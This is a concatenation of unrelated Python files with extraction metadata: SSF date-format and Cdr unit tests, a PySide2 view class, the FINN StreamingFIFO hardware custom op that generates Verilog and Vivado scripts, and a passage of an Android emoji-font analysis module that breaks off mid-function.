'pascal_case', (['property_key'], {}), '(property_key)\n', (13381, 13395), False, 'from deserialize.conversions import camel_case, pascal_case\n'), ((13562, 13607), 'deserialize.decorators._get_default', '_get_default', (['class_reference', 'attribute_name'], {}), '(class_reference, attribute_name)\n', (13574, 13607), False, 'from deserialize.decorators import default, _get_default, 
_has_default\n'), ((13837, 13926), 'deserialize.exceptions.DeserializeException', 'DeserializeException', (['f"""Unexpected missing value for: {debug_name}.{attribute_name}"""'], {}), "(\n f'Unexpected missing value for: {debug_name}.{attribute_name}')\n", (13857, 13926), False, 'from deserialize.exceptions import DeserializeException, InvalidBaseTypeException, NoDefaultSpecifiedException, UndefinedDowncastException, UnhandledFieldException\n')] |
from ssf import SSF
ssf = SSF(errors='raise')
def test_get_set_days():
dn = ssf.get_day_names()
assert isinstance(dn, tuple)
assert dn == (('Mon', 'Monday'),
('Tue', 'Tuesday'),
('Wed', 'Wednesday'),
('Thu', 'Thursday'),
('Fri', 'Friday'),
('Sat', 'Saturday'),
('Sun', 'Sunday'))
ssf.set_day_names([['MO', 'MON'],
('TU', 'TUE'), ['WE', 'WED'],
('TH', 'THU'), ['FR', 'FRI'],
('SA', 'SAT'), ['SU', 'SUN']])
assert ssf.format('ddd dddd', '10/3/2020') == 'SA SAT'
assert ssf.format('ddd dddd', '10/4/2020') == 'SU SUN'
assert ssf.format('ddd dddd', '10/5/2020') == 'MO MON'
assert ssf.format('ddd dddd', '10/6/2020') == 'TU TUE'
assert ssf.format('ddd dddd', '10/7/2020') == 'WE WED'
assert ssf.format('ddd dddd', '10/8/2020') == 'TH THU'
assert ssf.format('ddd dddd', '10/9/2020') == 'FR FRI'
try:
ssf.set_day_names(2)
assert False # Failed
except ValueError:
pass
try:
ssf.set_day_names((1, 2, 3, 4, 5, 6, 7))
assert False # Failed
except ValueError:
pass
def test_get_set_months():
mn = ssf.get_month_names()
assert isinstance(mn, tuple)
assert mn == (None, ('J', 'Jan', 'January'), ('F', 'Feb', 'February'), ('M', 'Mar', 'March'),
('A', 'Apr', 'April'), ('M', 'May', 'May'), ('J', 'Jun', 'June'), ('J', 'Jul', 'July'),
('A', 'Aug', 'August'), ('S', 'Sep', 'September'), ('O', 'Oct', 'October'),
('N', 'Nov', 'November'), ('D', 'Dec', 'December'))
ssf.set_month_names(mn[:-1] + (('X', 'DE', 'DEC'),) )
assert ssf.format('mmmmm mmm mmmm', '12/3/2020') == 'X DE DEC'
try:
ssf.set_month_names(2)
assert False # Failed
except ValueError:
pass
try:
ssf.set_month_names((0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12))
assert False # Failed
except ValueError:
pass
def test_get_load_table():
t = ssf.get_table()
assert t[0] == 'General'
assert t[1] == '0'
assert t[14] == 'm/d/yyyy'
assert t[49] == '@'
ssf.load_table({104:'yyyy-mm-dd', 105:'0.0'})
assert ssf.format(104, '10/6/2020') == '2020-10-06'
assert ssf.format(105, 3.4) == '3.4'
assert ssf.load('0') == 1
assert ssf.load('mmm mmmm') == 5 # Will be inserted at 5
assert ssf.load('@') == 49
assert ssf.format(5, '10/6/2020') == 'Oct October'
| [
"ssf.SSF"
] | [((26, 45), 'ssf.SSF', 'SSF', ([], {'errors': '"""raise"""'}), "(errors='raise')\n", (29, 45), False, 'from ssf import SSF\n')] |
#
# Copyright 2014-2018 Neueda Ltd.
#
from cdr import Cdr
import unittest
field1 = 1
field2 = 2
field3 = 55
class TestCdr(unittest.TestCase):
def get_a_cdr(self):
d = Cdr()
d.setInteger(field1, 123)
d.setString(field2, "Hello")
d.setString(field3, "World")
return d
def test_set_integer(self):
d = self.get_a_cdr()
self.assertEqual(d.getInt32(field1), 123)
def test_set_string(self):
d = self.get_a_cdr()
d.setString(field2, "Hello")
self.assertEqual(d.getString(field2), "Hello")
def test_get_exception(self):
d = self.get_a_cdr()
with self.assertRaises(RuntimeError):
d.getInteger(4)
def test_to_string(self):
d = Cdr()
d.setInteger(field1, 123)
self.assertEqual(d.toString(), "1=123")
def test_str(self):
d = Cdr()
d.setInteger(field1, 123)
def test_nested(self):
d = Cdr()
e = Cdr()
e.setString(1, "hello")
e.setString(2, "world")
d.appendArray(1, e)
f = d.getArray(1)
self.assertEqual(e.getString(1), f[0].getString(1))
self.assertEqual(e.getString(2), f[0].getString(2))
def test_to_python_dict(self):
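        # Values nested two levels deep must survive conversion to plain Python dicts and lists.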
d = Cdr()
e = Cdr()
f = Cdr()
f[21] = 400
e[11] = 300
e[12] = [f]
d[1] = 100
d[2] = 200
d[3] = [e]
assert(d.toPythonDict()[3][0][12][0][21] == 400)
if __name__ == '__main__':
unittest.main()
| [
"unittest.main",
"cdr.Cdr"
] | [((1531, 1546), 'unittest.main', 'unittest.main', ([], {}), '()\n', (1544, 1546), False, 'import unittest\n'), ((184, 189), 'cdr.Cdr', 'Cdr', ([], {}), '()\n', (187, 189), False, 'from cdr import Cdr\n'), ((762, 767), 'cdr.Cdr', 'Cdr', ([], {}), '()\n', (765, 767), False, 'from cdr import Cdr\n'), ((887, 892), 'cdr.Cdr', 'Cdr', ([], {}), '()\n', (890, 892), False, 'from cdr import Cdr\n'), ((967, 972), 'cdr.Cdr', 'Cdr', ([], {}), '()\n', (970, 972), False, 'from cdr import Cdr\n'), ((985, 990), 'cdr.Cdr', 'Cdr', ([], {}), '()\n', (988, 990), False, 'from cdr import Cdr\n'), ((1278, 1283), 'cdr.Cdr', 'Cdr', ([], {}), '()\n', (1281, 1283), False, 'from cdr import Cdr\n'), ((1296, 1301), 'cdr.Cdr', 'Cdr', ([], {}), '()\n', (1299, 1301), False, 'from cdr import Cdr\n'), ((1314, 1319), 'cdr.Cdr', 'Cdr', ([], {}), '()\n', (1317, 1319), False, 'from cdr import Cdr\n')] |
# -*- coding: utf-8 -*-
"""
# @SoftwareIDE : PyCharm2020Pro
# @ProjectName : PySide2MVCFramework
# @FileName : view.py
# @Author : 胡守杰
# @Email : <EMAIL>
# @ZhFileDescription :
# @EnFileDescription :
"""
import os
from pyside2mvcframework.core.view import View
from conf.global_settings import BASE_PATH
class InputWindowView(View):
uiFilePath = os.path.join(BASE_PATH, "src\\window\\inputWindow\\inputWindow.ui")
if __name__ == '__main__':
print("unit test from {filename}".format(filename=__file__))
import sys
from PySide2.QtWidgets import QApplication
app = QApplication(sys.argv)
view = InputWindowView().birth()
view.show()
sys.exit(app.exec_())
| [
"PySide2.QtWidgets.QApplication",
"os.path.join"
] | [((417, 484), 'os.path.join', 'os.path.join', (['BASE_PATH', '"""src\\\\window\\\\inputWindow\\\\inputWindow.ui"""'], {}), "(BASE_PATH, 'src\\\\window\\\\inputWindow\\\\inputWindow.ui')\n", (429, 484), False, 'import os\n'), ((652, 674), 'PySide2.QtWidgets.QApplication', 'QApplication', (['sys.argv'], {}), '(sys.argv)\n', (664, 674), False, 'from PySide2.QtWidgets import QApplication\n')] |
# Copyright (c) 2020, Xilinx
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# * Neither the name of FINN nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import os
import numpy as np
from shutil import copy
import subprocess
import math
import warnings
from finn.custom_op.fpgadataflow.hlscustomop import HLSCustomOp
from finn.core.datatype import DataType
from onnx import TensorProto, helper
from finn.util.data_packing import npy_to_rtlsim_input, rtlsim_output_to_npy
from . import templates
class StreamingFIFO(HLSCustomOp):
def __init__(self, onnx_node):
super().__init__(onnx_node)
self.strm_fifo_wrapper = templates.strm_fifo_wrapper
def get_nodeattr_types(self):
my_attrs = {
# FIFO depth
"depth": ("i", True, 0),
# folded shape of input/output
"folded_shape": ("ints", True, []),
# FINN DataTypes for inputs/outputs
"dataType": ("s", True, ""),
# Toggle between hls or IPI implementation
# rtl - use the hls generated IP during stitching
# vivado - use the AXI Infrastructure FIFO
"impl_style": ("s", False, "rtl", {"rtl", "vivado"}),
# FPGA resource type for FIFOs when impl_style is vivado
# auto -- let Vivado decide
# block -- use BRAM
# distributed -- use LUTRAM
# ultra -- use URAM (on UltraScale+)
"ram_style": (
"s",
False,
"auto",
{"auto", "block", "distributed", "ultra"},
),
}
my_attrs.update(super().get_nodeattr_types())
return my_attrs
def make_shape_compatible_op(self, model):
exp_ishape = self.get_normal_input_shape()
oshape = self.get_normal_output_shape()
ishape = tuple(model.get_tensor_shape(self.onnx_node.input[0]))
        assert ishape == tuple(exp_ishape), "Unexpected input shape for StreamingFIFO."
# implement tensor with correct shape
values = np.random.randn(*oshape).astype(np.float32)
return helper.make_node(
"Constant",
inputs=[],
outputs=[self.onnx_node.output[0]],
value=helper.make_tensor(
name="const_tensor",
data_type=TensorProto.FLOAT,
dims=values.shape,
vals=values.flatten().astype(float),
),
)
def infer_node_datatype(self, model):
node = self.onnx_node
idt = model.get_tensor_datatype(node.input[0])
if idt != self.get_input_datatype():
warn_str = "inputDataType changing for %s: %s -> %s " % (
node.name,
str(self.get_input_datatype()),
str(idt),
)
warnings.warn(warn_str)
self.set_nodeattr("dataType", idt.name)
# data type stays the same
model.set_tensor_datatype(node.output[0], idt)
def verify_node(self):
pass
def get_verilog_top_module_name(self):
"Return the Verilog top module name for this node."
node = self.onnx_node
prefixed_top_name = "%s" % (node.name)
return prefixed_top_name
def code_generation_ipgen(self, model, fpgapart, clk):
code_gen_dir = self.get_nodeattr("code_gen_dir_ipgen")
verilog_dir = "{}/project_{}/sol1/impl/verilog".format(
code_gen_dir, self.onnx_node.name
)
os.makedirs(verilog_dir)
# copy Q_srl.v from finn-rtllib to verilog directory
memstream_dir = "/workspace/finn/finn-rtllib/memstream/hdl/"
Q_file = os.path.join(memstream_dir, "Q_srl.v")
copy(Q_file, verilog_dir)
# empty code gen dictionary for new entries
self.code_gen_dict.clear()
self.code_gen_dict["$TOPNAME$"] = ["{}".format(self.onnx_node.name)]
self.code_gen_dict["$LAYER_NAME$"] = [
"{}_{}".format(self.onnx_node.name, self.onnx_node.name)
]
# make instream width a multiple of 8 for axi interface
in_width = self.get_instream_width_padded()
count_width = int(self.get_nodeattr("depth") - 1).bit_length()
self.code_gen_dict["$COUNT_RANGE$"] = ["[{}:0]".format(count_width - 1)]
self.code_gen_dict["$IN_RANGE$"] = ["[{}:0]".format(in_width - 1)]
self.code_gen_dict["$OUT_RANGE$"] = ["[{}:0]".format(in_width - 1)]
self.code_gen_dict["$WIDTH$"] = [str(in_width)]
self.code_gen_dict["$DEPTH$"] = [str(self.get_nodeattr("depth"))]
template = self.strm_fifo_wrapper
for key in self.code_gen_dict:
# transform list into long string separated by '\n'
code_gen_line = "\n".join(self.code_gen_dict[key])
template = template.replace(key, code_gen_line)
f = open(os.path.join(verilog_dir, "{}.v".format(self.onnx_node.name)), "w")
f.write(template)
f.close()
self.code_gen_dict.clear()
def ipgen_singlenode_code(self):
code_gen_dir = self.get_nodeattr("code_gen_dir_ipgen")
verilog_dir = "{}/project_{}/sol1/impl/verilog".format(
code_gen_dir, self.onnx_node.name
)
# prepare the IP packaging tcl template
template = templates.ip_package_tcl
self.code_gen_dict.clear()
self.code_gen_dict["$TOPNAME$"] = ["{}".format(self.onnx_node.name)]
# note: setting the root dir as absolute can cause path problems
# the ipgen script will be invoked from the sources dir so root_dir=. is OK
self.code_gen_dict["$VERILOG_DIR$"] = ["."]
for key in self.code_gen_dict:
# transform list into long string separated by '\n'
code_gen_line = "\n".join(self.code_gen_dict[key])
template = template.replace(key, code_gen_line)
f = open(os.path.join(verilog_dir, "package_ip.tcl"), "w")
f.write(template)
f.close()
# create a shell script and call Vivado to invoke the IP pkg script
make_project_sh = verilog_dir + "/make_ip.sh"
working_dir = os.environ["PWD"]
with open(make_project_sh, "w") as f:
f.write("#!/bin/bash \n")
f.write("cd {}\n".format(verilog_dir))
f.write("vivado -mode batch -source package_ip.tcl\n")
f.write("cd {}\n".format(working_dir))
bash_command = ["bash", make_project_sh]
process_compile = subprocess.Popen(bash_command, stdout=subprocess.PIPE)
process_compile.communicate()
# set ipgen_path and ip_path to point to the new packaged IP
self.set_nodeattr("ipgen_path", verilog_dir)
self.set_nodeattr("ip_path", verilog_dir)
vlnv = "xilinx.com:hls:%s:1.0" % (self.onnx_node.name)
self.set_nodeattr("ip_vlnv", vlnv)
self.code_gen_dict.clear()
def get_normal_input_shape(self):
depth = self.get_nodeattr("depth")
# depth has to be between 2 and 256 with the current
# StreamingFIFO implementation
assert depth >= 2, """Depth is too low"""
if depth > 256 and self.get_nodeattr("impl_style") == "rtl":
warnings.warn(
"Depth is high, set between 2 and 256 for efficient SRL implementation"
)
# derive normal shape from folded shape
# StreamingFIFOs are inserted in between fpgadataflow nodes
# the folded shape could be for example (1, nf, pe)
# with nf (neuron folding): mh // pe
# the normal input shape is in this case (1, mh)
# so to achieve this the two inner dimensions are multiplied
# and together with all previous dimensions
# this gives the normal input shape
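        # e.g. a folded shape of (1, 49, 16) gives a normal input shape of (1, 49 * 16) = (1, 784)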
folded_shape = self.get_nodeattr("folded_shape")
# extract inner dimension
inner_dim = folded_shape[-1]
# multiply with the next inner dimension
folding_factor = folded_shape[-2] * inner_dim
normal_ishape = []
# create the normal_ishape
for i in range(len(folded_shape) - 2):
normal_ishape.append(folded_shape[i])
normal_ishape.append(folding_factor)
return normal_ishape
def get_normal_output_shape(self):
return self.get_normal_input_shape()
def get_folded_input_shape(self):
return self.get_nodeattr("folded_shape")
def get_folded_output_shape(self):
return self.get_nodeattr("folded_shape")
def get_instream_width(self):
dtype = DataType[self.get_nodeattr("dataType")]
folded_shape = self.get_nodeattr("folded_shape")
in_width = folded_shape[-1] * dtype.bitwidth()
return in_width
def get_outstream_width(self):
dtype = DataType[self.get_nodeattr("dataType")]
folded_shape = self.get_nodeattr("folded_shape")
in_width = folded_shape[-1] * dtype.bitwidth()
return in_width
def execute_node(self, context, graph):
mode = self.get_nodeattr("exec_mode")
node = self.onnx_node
inp = context[node.input[0]]
exp_shape = self.get_normal_input_shape()
if mode == "cppsim":
output = inp
output = np.asarray([output], dtype=np.float32).reshape(*exp_shape)
context[node.output[0]] = output
elif mode == "rtlsim":
code_gen_dir = self.get_nodeattr("code_gen_dir_ipgen")
# create a npy file for the input of the node
assert (
str(inp.dtype) == "float32"
), """Input datatype is
not float32 as expected."""
expected_inp_shape = self.get_folded_input_shape()
reshaped_input = inp.reshape(expected_inp_shape)
if DataType[self.get_nodeattr("dataType")] == DataType.BIPOLAR:
# store bipolar activations as binary
reshaped_input = (reshaped_input + 1) / 2
export_idt = DataType.BINARY
else:
export_idt = DataType[self.get_nodeattr("dataType")]
# make copy before saving the array
reshaped_input = reshaped_input.copy()
np.save(os.path.join(code_gen_dir, "input_0.npy"), reshaped_input)
sim = self.get_rtlsim()
nbits = self.get_instream_width()
inp = npy_to_rtlsim_input(
"{}/input_0.npy".format(code_gen_dir), export_idt, nbits
)
super().reset_rtlsim(sim)
super().toggle_clk(sim)
output = self.rtlsim(sim, inp)
odt = DataType[self.get_nodeattr("dataType")]
target_bits = odt.bitwidth()
packed_bits = self.get_outstream_width()
out_npy_path = "{}/output.npy".format(code_gen_dir)
out_shape = self.get_folded_output_shape()
rtlsim_output_to_npy(
output, out_npy_path, odt, out_shape, packed_bits, target_bits
)
# load and reshape output
output = np.load(out_npy_path)
oshape = self.get_normal_output_shape()
output = np.asarray([output], dtype=np.float32).reshape(*oshape)
context[node.output[0]] = output
else:
raise Exception(
"""Invalid value for attribute exec_mode! Is currently set to: {}
has to be set to one of the following value ("cppsim", "rtlsim")""".format(
mode
)
)
def get_number_output_values(self):
folded_oshape = self.get_folded_output_shape()
return np.prod(folded_oshape[:-1])
def global_includes(self):
pass
def defines(self, var):
pass
def read_npy_data(self):
pass
def strm_decl(self):
pass
def docompute(self):
pass
def dataoutstrm(self):
pass
def save_as_npy(self):
pass
def blackboxfunction(self):
pass
def pragmas(self):
pass
def code_generation_ipi(self):
impl_style = self.get_nodeattr("impl_style")
if impl_style == "rtl":
return super().code_generation_ipi()
elif impl_style == "vivado":
cmd = []
node_name = self.onnx_node.name
depth = self.get_nodeattr("depth")
ram_style = self.get_nodeattr("ram_style")
# create a hierarchy for this layer, with the same port names
clk_name = self.get_verilog_top_module_intf_names()["clk"][0]
rst_name = self.get_verilog_top_module_intf_names()["rst"][0]
dout_name = self.get_verilog_top_module_intf_names()["m_axis"][0][0]
din_name = self.get_verilog_top_module_intf_names()["s_axis"][0][0]
cmd.append("create_bd_cell -type hier %s" % node_name)
cmd.append("create_bd_pin -dir I -type clk /%s/%s" % (node_name, clk_name))
cmd.append("create_bd_pin -dir I -type rst /%s/%s" % (node_name, rst_name))
cmd.append(
"create_bd_intf_pin -mode Master "
"-vlnv xilinx.com:interface:axis_rtl:1.0 /%s/%s"
% (node_name, dout_name)
)
cmd.append(
"create_bd_intf_pin -mode Slave "
"-vlnv xilinx.com:interface:axis_rtl:1.0 /%s/%s" % (node_name, din_name)
)
            # instantiate and configure the AXI-Stream Data FIFO
cmd.append(
"create_bd_cell -type ip "
"-vlnv xilinx.com:ip:axis_data_fifo:2.0 /%s/fifo" % node_name
)
cmd.append(
"set_property -dict [list CONFIG.FIFO_DEPTH {%d}] "
"[get_bd_cells /%s/fifo]" % (depth, node_name)
)
cmd.append(
"set_property -dict [list CONFIG.FIFO_MEMORY_TYPE {%s}] "
"[get_bd_cells /%s/fifo]" % (ram_style, node_name)
)
cmd.append(
"set_property -dict [list CONFIG.TDATA_NUM_BYTES {%d}] "
"[get_bd_cells /%s/fifo]"
% (np.ceil(self.get_outstream_width() / 8), node_name)
)
cmd.append(
"connect_bd_intf_net [get_bd_intf_pins %s/fifo/M_AXIS] "
"[get_bd_intf_pins %s/%s]" % (node_name, node_name, dout_name)
)
cmd.append(
"connect_bd_intf_net [get_bd_intf_pins %s/fifo/S_AXIS] "
"[get_bd_intf_pins %s/%s]" % (node_name, node_name, din_name)
)
cmd.append(
"connect_bd_net [get_bd_pins %s/%s] "
"[get_bd_pins %s/fifo/s_axis_aresetn]"
% (node_name, rst_name, node_name)
)
cmd.append(
"connect_bd_net [get_bd_pins %s/%s] "
"[get_bd_pins %s/fifo/s_axis_aclk]" % (node_name, clk_name, node_name)
)
return cmd
else:
raise Exception(
"FIFO implementation style %s not supported, please use rtl or vivado"
% impl_style
)
def bram_estimation(self):
"""Calculates resource estimation for BRAM"""
impl = self.get_nodeattr("impl_style")
ram_type = self.get_nodeattr("ram_style")
depth = self.get_nodeattr("depth")
W = self.get_instream_width()
if impl == "rtl" or (impl == "vivado" and ram_type != "block"):
# Non-BRAM based implementation
return 0
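        # The depth thresholds below correspond to the 18Kb BRAM aspect ratios
        # (16Kx1, 8Kx2, 4Kx4, 2Kx9, 1Kx18, 512x36): pick the narrowest shape that covers W.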
if W == 1:
return math.ceil(depth / 16384)
elif W == 2:
return math.ceil(depth / 8192)
elif W <= 4:
return (math.ceil(depth / 4096)) * (math.ceil(W / 4))
elif W <= 9:
return (math.ceil(depth / 2048)) * (math.ceil(W / 9))
elif W <= 18 or depth > 512:
return (math.ceil(depth / 1024)) * (math.ceil(W / 18))
else:
return (math.ceil(depth / 512)) * (math.ceil(W / 36))
def uram_estimation(self):
"""Calculates resource estimation for URAM"""
impl = self.get_nodeattr("impl_style")
ram_type = self.get_nodeattr("ram_style")
depth = self.get_nodeattr("depth")
W = self.get_instream_width()
if impl == "rtl" or (impl == "vivado" and ram_type != "ultra"):
# Non-BRAM based implementation
return 0
else:
return (math.ceil(depth / 4096)) * (math.ceil(W / 72))
def bram_efficiency_estimation(self):
depth = self.get_nodeattr("depth")
W = self.get_instream_width()
bram16_est = self.bram_estimation()
if bram16_est == 0:
return 1
wbits = W * depth
bram16_est_capacity = bram16_est * 36 * 512
return wbits / bram16_est_capacity
def lut_estimation(self):
"""Calculates resource estimations for LUTs"""
impl = self.get_nodeattr("impl_style")
ram_type = self.get_nodeattr("ram_style")
depth = self.get_nodeattr("depth")
W = self.get_instream_width()
address_luts = 2 * math.ceil(math.log(depth, 2))
if impl == "rtl" or (impl == "vivado" and ram_type == "distributed"):
ram_luts = (math.ceil(depth / 32)) * (math.ceil(W / 2))
else:
ram_luts = 0
return int(address_luts + ram_luts)
def prepare_rtlsim(self):
assert self.get_nodeattr("impl_style") != "vivado", (
"StreamingFIFO impl_style "
"cannot be vivado for rtlsim. Only impl_style=rtl supported."
)
super().prepare_rtlsim()
| [
"numpy.prod",
"finn.util.data_packing.rtlsim_output_to_npy",
"math.ceil",
"os.makedirs",
"subprocess.Popen",
"os.path.join",
"numpy.asarray",
"math.log",
"shutil.copy",
"warnings.warn",
"numpy.load",
"numpy.random.randn"
] | [((4864, 4888), 'os.makedirs', 'os.makedirs', (['verilog_dir'], {}), '(verilog_dir)\n', (4875, 4888), False, 'import os\n'), ((5036, 5074), 'os.path.join', 'os.path.join', (['memstream_dir', '"""Q_srl.v"""'], {}), "(memstream_dir, 'Q_srl.v')\n", (5048, 5074), False, 'import os\n'), ((5083, 5108), 'shutil.copy', 'copy', (['Q_file', 'verilog_dir'], {}), '(Q_file, verilog_dir)\n', (5087, 5108), False, 'from shutil import copy\n'), ((7852, 7906), 'subprocess.Popen', 'subprocess.Popen', (['bash_command'], {'stdout': 'subprocess.PIPE'}), '(bash_command, stdout=subprocess.PIPE)\n', (7868, 7906), False, 'import subprocess\n'), ((12985, 13012), 'numpy.prod', 'np.prod', (['folded_oshape[:-1]'], {}), '(folded_oshape[:-1])\n', (12992, 13012), True, 'import numpy as np\n'), ((4195, 4218), 'warnings.warn', 'warnings.warn', (['warn_str'], {}), '(warn_str)\n', (4208, 4218), False, 'import warnings\n'), ((7260, 7303), 'os.path.join', 'os.path.join', (['verilog_dir', '"""package_ip.tcl"""'], {}), "(verilog_dir, 'package_ip.tcl')\n", (7272, 7303), False, 'import os\n'), ((8571, 8662), 'warnings.warn', 'warnings.warn', (['"""Depth is high, set between 2 and 256 for efficient SRL implementation"""'], {}), "(\n 'Depth is high, set between 2 and 256 for efficient SRL implementation')\n", (8584, 8662), False, 'import warnings\n'), ((16926, 16950), 'math.ceil', 'math.ceil', (['(depth / 16384)'], {}), '(depth / 16384)\n', (16935, 16950), False, 'import math\n'), ((3420, 3444), 'numpy.random.randn', 'np.random.randn', (['*oshape'], {}), '(*oshape)\n', (3435, 3444), True, 'import numpy as np\n'), ((12233, 12321), 'finn.util.data_packing.rtlsim_output_to_npy', 'rtlsim_output_to_npy', (['output', 'out_npy_path', 'odt', 'out_shape', 'packed_bits', 'target_bits'], {}), '(output, out_npy_path, odt, out_shape, packed_bits,\n target_bits)\n', (12253, 12321), False, 'from finn.util.data_packing import npy_to_rtlsim_input, rtlsim_output_to_npy\n'), ((12407, 12428), 'numpy.load', 'np.load', (['out_npy_path'], {}), '(out_npy_path)\n', (12414, 12428), True, 'import numpy as np\n'), ((16991, 17014), 'math.ceil', 'math.ceil', (['(depth / 8192)'], {}), '(depth / 8192)\n', (17000, 17014), False, 'import math\n'), ((17810, 17833), 'math.ceil', 'math.ceil', (['(depth / 4096)'], {}), '(depth / 4096)\n', (17819, 17833), False, 'import math\n'), ((17838, 17855), 'math.ceil', 'math.ceil', (['(W / 72)'], {}), '(W / 72)\n', (17847, 17855), False, 'import math\n'), ((18497, 18515), 'math.log', 'math.log', (['depth', '(2)'], {}), '(depth, 2)\n', (18505, 18515), False, 'import math\n'), ((18620, 18641), 'math.ceil', 'math.ceil', (['(depth / 32)'], {}), '(depth / 32)\n', (18629, 18641), False, 'import math\n'), ((18646, 18662), 'math.ceil', 'math.ceil', (['(W / 2)'], {}), '(W / 2)\n', (18655, 18662), False, 'import math\n'), ((10598, 10636), 'numpy.asarray', 'np.asarray', (['[output]'], {'dtype': 'np.float32'}), '([output], dtype=np.float32)\n', (10608, 10636), True, 'import numpy as np\n'), ((11566, 11607), 'os.path.join', 'os.path.join', (['code_gen_dir', '"""input_0.npy"""'], {}), "(code_gen_dir, 'input_0.npy')\n", (11578, 11607), False, 'import os\n'), ((12502, 12540), 'numpy.asarray', 'np.asarray', (['[output]'], {'dtype': 'np.float32'}), '([output], dtype=np.float32)\n', (12512, 12540), True, 'import numpy as np\n'), ((17056, 17079), 'math.ceil', 'math.ceil', (['(depth / 4096)'], {}), '(depth / 4096)\n', (17065, 17079), False, 'import math\n'), ((17084, 17100), 'math.ceil', 'math.ceil', (['(W / 4)'], {}), '(W / 4)\n', (17093, 17100), 
False, 'import math\n'), ((17143, 17166), 'math.ceil', 'math.ceil', (['(depth / 2048)'], {}), '(depth / 2048)\n', (17152, 17166), False, 'import math\n'), ((17171, 17187), 'math.ceil', 'math.ceil', (['(W / 9)'], {}), '(W / 9)\n', (17180, 17187), False, 'import math\n'), ((17246, 17269), 'math.ceil', 'math.ceil', (['(depth / 1024)'], {}), '(depth / 1024)\n', (17255, 17269), False, 'import math\n'), ((17274, 17291), 'math.ceil', 'math.ceil', (['(W / 18)'], {}), '(W / 18)\n', (17283, 17291), False, 'import math\n'), ((17327, 17349), 'math.ceil', 'math.ceil', (['(depth / 512)'], {}), '(depth / 512)\n', (17336, 17349), False, 'import math\n'), ((17354, 17371), 'math.ceil', 'math.ceil', (['(W / 36)'], {}), '(W / 36)\n', (17363, 17371), False, 'import math\n')] |
import ast
import emoji
import os
import pandas as pd
_SUPPORT_CACHE_CSV = emoji.datafile('emoji_support.csv')
_API_LEVELS = {
1: ("(no codename)", "1.0"),
2: ("(no codename)", "1.1"),
3: ("Cupcake", "1.5 "),
4: ("Donut", "1.6 "),
5: ("Eclair", "2.0"),
6: ("Eclair", "2.0.1"),
7: ("Eclair", "2.1 "),
8: ("Froyo", "2.2.x "),
9: ("Gingerbread", "2.3 - 2.3.2 "),
10: ("Gingerbread", "2.3.3 - 2.3.7"),
11: ("Honeycomb", "3.0"),
12: ("Honeycomb", "3.1 "),
13: ("Honeycomb", "3.2.x"),
14: ("Ice Cream Sandwich", "4.0.1 - 4.0.2 "),
15: ("Ice Cream Sandwich", "4.0.3 - 4.0.4 "),
16: ("Jelly Bean", "4.1.x"),
17: ("Jelly Bean", "4.2.x"),
18: ("Jelly Bean", "4.3.x"),
19: ("KitKat", "4.4 - 4.4.4"),
21: ("Lollipop", "5.0"),
22: ("Lollipop", "5.1"),
23: ("Marshmallow", "6.0"),
24: ("Nougat", "7.0"),
25: ("Nougat", "7.1"),
26: ("Oreo", "8.0.0"),
27: ("Oreo", "8.1.0"),
28: ("Pie", "9"),
29: ("Android 10 (Q)", "10"),
30: ("Android 11 (R)", "11"),
31: ("Android 12 (S)", "12"),
}
def api_levels():
return _API_LEVELS
def is_font_file(file):
_, ext = os.path.splitext(file)
return ext.lower() in {'.ttf', '.otf', '.ttc'}
def metadata():
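    """Walk api_level/ and return a DataFrame with one row per font file:
    columns are api_level, font_file and file_size."""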
records = []
for root, dirs, files in os.walk('api_level'):
for file in files:
if is_font_file(file):
full_file = os.path.join(root, file)
api_level = int(os.path.basename(root))
size = os.stat(full_file).st_size
records.append((api_level, full_file, size))
df = pd.DataFrame(records)
df.columns = ['api_level', 'font_file', 'file_size']
return df
def emoji_support():
"""Dataframe of [emoji_level, font_file, codepoints, supported].
Includes every sequence we could find of any type.
Requires prior execution of populate_emoji_support.py"""
if not os.path.isfile(_SUPPORT_CACHE_CSV):
raise IOError('Please run populate_emoji_support.py first')
return (pd.read_csv(_SUPPORT_CACHE_CSV, converters={'cp_seq': ast.literal_eval})
.rename(columns={'cp_seq': 'codepoints'}))
def font_summary():
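    """Aggregate per API level: number of font files, total size in MB and the
    size delta versus the previous API level."""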
df = metadata()
sf = (df
.groupby(['api_level'])
.agg({'font_file': 'count', 'file_size': 'sum'}))
sf['file_size'] = sf['file_size'].apply(lambda sz: (sz / pow(2, 20)))
sf.rename(columns = {
'font_file': 'num_files',
'file_size': 'size_MB',
}, inplace=True)
sf['delta_size_MB'] = sf['size_MB'] - sf['size_MB'].shift(1)
sf.reset_index(inplace=True)
return sf
def emoji_detail():
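    """One row per fully-qualified emoji sequence per font file, with a 0/1
    supported flag and api_level parsed out of the font path."""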
df = emoji_support()
# merge emoji metadata to gain the status column
df = df.merge(emoji.metadata().drop(columns=['emoji_level']),
on='codepoints')
df = df[df['status'] == 'fully-qualified']
df = df.drop(columns='status')
df.supported = df.supported.astype('int32')
df['api_level'] = df.font_file.str.split('/').str[1]
df.api_level = df.api_level.astype('int32')
df['font_file'] = df.font_file.str.split('/').str[2]
return df
def emoji_summary():
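    """Return (per font/emoji-level summary, per API-level summary) of supported
    versus total emoji sequences."""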
